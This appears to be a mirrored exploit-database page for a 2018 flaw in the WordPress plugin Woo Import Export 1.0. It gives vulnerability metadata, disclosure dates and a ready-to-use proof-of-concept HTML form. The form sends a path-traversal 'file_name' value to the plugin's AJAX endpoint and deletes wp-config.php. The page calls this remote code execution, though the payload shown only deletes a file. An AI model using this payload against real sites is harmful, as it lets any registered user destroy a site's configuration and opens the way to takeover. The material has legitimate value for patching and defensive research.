Plugin to Wordpress Woo Import Export 1.0 RCE

vendor:

Woo Import Export

by:

Lenon Leite

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Woo Import Export

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:wordpress:wordpress:4.9.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 16.1

2018

Plugin to WordPress Woo Import Export 1.0 RCE – Unlink

A vulnerability in the Plugin to Wordpress Woo Import Export 1.0 allows an attacker to execute arbitrary code on the server. This is due to the fact that the $_POST['file_name'] parameter is not escaped. An attacker can craft a malicious request to the server and execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

<!--
# Exploit Title:  Plugin to Wordpress Woo Import Export 1.0 RCE – Unlink
# Date: 24/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: * https://wordpress.org/plugins/woo-import-export-lite/
# Software Link: * https://wordpress.org/plugins/woo-import-export-lite/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version:  1.0
# Tested on: Ubuntu 16.1


1 - Description


   - Type user access: any user registered.
         - $_POST['file_name'] is not escaped.

Article:
*http://lenonleite.com.br/en/publish-exploits/english-plugin-woo-import-export-1-0-rce-unlink/

Video:

*https://www.youtube.com/watch?v=pImtGeecdCk

2. Proof of Concept
-->

<form method="post"
action="http://server/wp-admin/admin-ajax.php?action=wpie_remove_export_entry">
   <input type="text" name="file_name" value="../../../wp-config.php">
   <input type="text" name="log_id" value="aaa">
   <input type="submit">
</form>

<!--
   - Date Discovery : *11/25/2017*
      - Date Vendor Contact : *12/29/2017*
      - Date Publish : 24/04/2018
      - Date Resolution :
-->